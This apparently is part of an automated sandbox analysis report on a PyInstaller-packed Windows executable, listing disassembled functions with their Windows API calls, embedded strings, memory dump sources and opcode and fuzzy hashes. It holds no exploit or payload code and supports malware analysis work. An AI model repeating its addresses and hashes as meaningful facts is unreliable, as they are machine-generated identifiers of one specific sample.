                                                              • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F78EFD
                                                              • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F78F5A
                                                                • Part of subcall function 00007FF623F79390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF623F745F4,00000000,00007FF623F71985), ref: 00007FF623F793C9
                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F78FE5
                                                              • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F79044
                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F79055
                                                              • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF623F73FA9), ref: 00007FF623F7906A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                              • String ID:
                                                              • API String ID: 3462794448-0
                                                              • Opcode ID: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
                                                              • Instruction ID: 2c53ece78454e4b07719661e04cfea62d7972435f305a6a4e15846e914faf7ef
                                                              • Opcode Fuzzy Hash: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
                                                              • Instruction Fuzzy Hash: 6841A362A1968281EE309F22B9026BA73A4FB88BD4F444175DF4DEB799DF3CD600C701
                                                              Function 00007FFE133362D0 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                              • String ID:
                                                              • API String ID: 3741236498-0
                                                              • Opcode ID: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
                                                              • Instruction ID: b6b173b7e931ee05b1d5bfc260620591b4c8b3055403ee34a42d573337af0ee4
                                                              • Opcode Fuzzy Hash: 6447550c70440ae48e9dc09acfbe7fa3055870e3a5d625089a78ddc05dba8847
                                                              • Instruction Fuzzy Hash: 0631D322B19F5588EB11CB27A844569A3A0FF68FF4B598675DE3D133A0EE3DD442C304
                                                              Function 00007FF623F790E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF623F78570: GetCurrentProcess.KERNEL32 ref: 00007FF623F78590
                                                                • Part of subcall function 00007FF623F78570: OpenProcessToken.ADVAPI32 ref: 00007FF623F785A3
                                                                • Part of subcall function 00007FF623F78570: GetTokenInformation.ADVAPI32 ref: 00007FF623F785C8
                                                                • Part of subcall function 00007FF623F78570: GetLastError.KERNEL32 ref: 00007FF623F785D2
                                                                • Part of subcall function 00007FF623F78570: GetTokenInformation.ADVAPI32 ref: 00007FF623F78612
                                                                • Part of subcall function 00007FF623F78570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF623F7862E
                                                                • Part of subcall function 00007FF623F78570: CloseHandle.KERNEL32 ref: 00007FF623F78646
                                                              • LocalFree.KERNEL32(?,00007FF623F73C55), ref: 00007FF623F7916C
                                                              • LocalFree.KERNEL32(?,00007FF623F73C55), ref: 00007FF623F79175
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                              • API String ID: 6828938-1529539262
                                                              • Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                              • Instruction ID: 1a3cbe0d82a5fa058f9544afe8b94bd22cda0c85fabc9548ec5981d8a3131eed
                                                              • Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
                                                              • Instruction Fuzzy Hash: 29215E21A0874281FE10AF10FD162FA6261FF88780F5440B6EA4DA7796DF3CEA45C742
                                                              Function 00007FF623F8B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B2D7
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B30D
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B33A
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B34B
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B35C
                                                              • SetLastError.KERNEL32(?,?,?,00007FF623F84F11,?,?,?,?,00007FF623F8A48A,?,?,?,?,00007FF623F8718F), ref: 00007FF623F8B377
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                              • Instruction ID: f00d6afa48f6f6be69baa397b6aa43d1c59a6f99c05a2b81ad9ed6dfd4c8b05e
                                                              • Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
                                                              • Instruction Fuzzy Hash: 87113B20B0D74286FE5C67227E9313D51429F54BF0F0546B4E82EE76E6EF6CAA018303
                                                              Function 00007FFE133338A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: abort$CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2889003569-2084237596
                                                              • Opcode ID: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
                                                              • Instruction ID: 2cd47ce95c0c88a071afbf8785434c4daa82dd096faf6d08c15c5fe90415782d
                                                              • Opcode Fuzzy Hash: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
                                                              • Instruction Fuzzy Hash: DF91A273A08B818EE710CB66E4802ADBBA0F754BA8F108169EF9D27765DF3CD195C704
                                                              Function 00007FFDFAEFA470 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 181COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007A3440ErrorLast
                                                              • String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
                                                              • API String ID: 848807496-4291904164
                                                              • Opcode ID: 43a2a23570172f1492d2df20069b1eec957ebead7fe1968015ea09c30e310cbe
                                                              • Instruction ID: e57ecba05ab1b626570a9b2a2d843f8f520feec533732eb7f5987925f1ca85d3
                                                              • Opcode Fuzzy Hash: 43a2a23570172f1492d2df20069b1eec957ebead7fe1968015ea09c30e310cbe
                                                              • Instruction Fuzzy Hash: EC717F61B1C68386FB28AB51E420AB96790EF85794F440171FE6F0BBDEDE3DE6418600
                                                              Function 00007FFE1333BB70 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                              • API String ID: 2943138195-757766384
                                                              • Opcode ID: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
                                                              • Instruction ID: a3a816140131f9093ca99cdddb6722e61448e9bd2deb45d92c232bea8cd958e8
                                                              • Opcode Fuzzy Hash: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
                                                              • Instruction Fuzzy Hash: 66718071A08F468CEB688F17D9401BCA7A4BB25BA4F4481B5DA6D27B79DF3CE150C304
                                                              Function 00007FFE13333690 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: abort$CallEncodePointerTranslator
                                                              • String ID: MOC$RCC
                                                              • API String ID: 2889003569-2084237596
                                                              • Opcode ID: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
                                                              • Instruction ID: b9015ad7ffae901a73d584ca02f5668268be6fc55f1365391e339ef27abdbd74
                                                              • Opcode Fuzzy Hash: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
                                                              • Instruction Fuzzy Hash: EC614B76A08F858AE714CF66D4803ADB7A0FB54BA8F048165EF5D27B68CF38E095C704
                                                              Function 00007FFDFAFA1D4D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc
                                                              • String ID: OPENSSL_Uplink(%p,%02X):
                                                              • API String ID: 1883125708-1089269818
                                                              • Opcode ID: 4ccc3ce23c4402700d34cdd1b44a20b3c7d878ed7d0ac8f9f23aaafae92de14e
                                                              • Instruction ID: 98e489c0ee85ea253a0d50df8d61682e48040030f46a39577cd0470b58103a04
                                                              • Opcode Fuzzy Hash: 4ccc3ce23c4402700d34cdd1b44a20b3c7d878ed7d0ac8f9f23aaafae92de14e
                                                              • Instruction Fuzzy Hash: 6F510D61E0EB4785EB128F24AC2097433A1BF59768B445735E97D862FEEF7CB2958300
                                                              Function 00007FF623F72910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF623F71B6A), ref: 00007FF623F7295E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                              • API String ID: 2050909247-2962405886
                                                              • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                              • Instruction ID: f9a39529a5b234771d593de5a283665fe3fc7bae8116136f09332f594c06bfe4
                                                              • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                              • Instruction Fuzzy Hash: AF31E522B1868152EB20AB65BC426E76395BF887D4F404132FE8DE7759EF3CD64AC301
                                                              Function 00007FF623F72390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                              • String ID: Unhandled exception in script
                                                              • API String ID: 3081866767-2699770090
                                                              • Opcode ID: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                              • Instruction ID: f58730723d54cc892e689ef77e84233e49d46a4fa7fb574409566fa4515cf1d1
                                                              • Opcode Fuzzy Hash: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
                                                              • Instruction Fuzzy Hash: 6C316D32619A8288EF249F61FC562FA6360FF88784F404175EA4D9BB59DF3CD2058702
                                                              Function 00007FF623F72B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF623F7918F,?,00007FF623F73C55), ref: 00007FF623F72BA0
                                                              • MessageBoxW.USER32 ref: 00007FF623F72C2A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentMessageProcess
                                                              • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                              • API String ID: 1672936522-3797743490
                                                              • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                              • Instruction ID: 633c053749da599ea1d08711b777b20556a13f5dba891bad8f74c309546b88fb
                                                              • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                              • Instruction Fuzzy Hash: 13219F62718B4192EB209F15F8467AA63A4EB887C0F404136EA8DA7759EF3CD705C741
                                                              Function 00007FF623F72710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF623F71B99), ref: 00007FF623F72760
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                              • API String ID: 2050909247-1591803126
                                                              • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                              • Instruction ID: a31779226f15b1500ffc5330ede193b4cc07f4b1ea44a9b554c26a37e72fd7e9
                                                              • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                              • Instruction Fuzzy Hash: 4F218132A1878152EB209F51BC427E663A4FB887C4F404176EE8CA7659DF7CD6498741
                                                              Function 00007FF623F89A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                              • Instruction ID: 8098fd74451ce5bd59f3fff9dabd7091e178d9d553e75a76e61e078432e6afdd
                                                              • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                              • Instruction Fuzzy Hash: 7FF0C221B1970681FE148F25FC8A77A2330AF487A1F544275CA6E976F4CF2CD684C302
                                                              Function 00007FFE13339FA4 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: NameName::$Name::operator+
                                                              • String ID:
                                                              • API String ID: 826178784-0
                                                              • Opcode ID: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
                                                              • Instruction ID: 328387821016c58903174ebb9e65206714d7a90bac5e9967d06da42164defca5
                                                              • Opcode Fuzzy Hash: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
                                                              • Instruction Fuzzy Hash: 2C414C32E08E568CF710CB22D8801F873A4BB25BA0B5480B6DA6D637B5DF3CE956D304
                                                              Function 00007FF623F99368 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction ID: 791fd5ebaaf16c9eec2790a5d4f1263c8d462d5d3f2eada70adb4a9037bdaeaf
                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction Fuzzy Hash: F3119322D58A0241FE541D5AFC9377B1174AF5C360E06C6B4EE6EB72D68F6C66814102
                                                              Function 00007FF623F8B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B3AF
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF623F8A5A3,?,?,00000000,00007FF623F8A83E,?,?,?,?,?,00007FF623F8A7CA), ref: 00007FF623F8B3CE
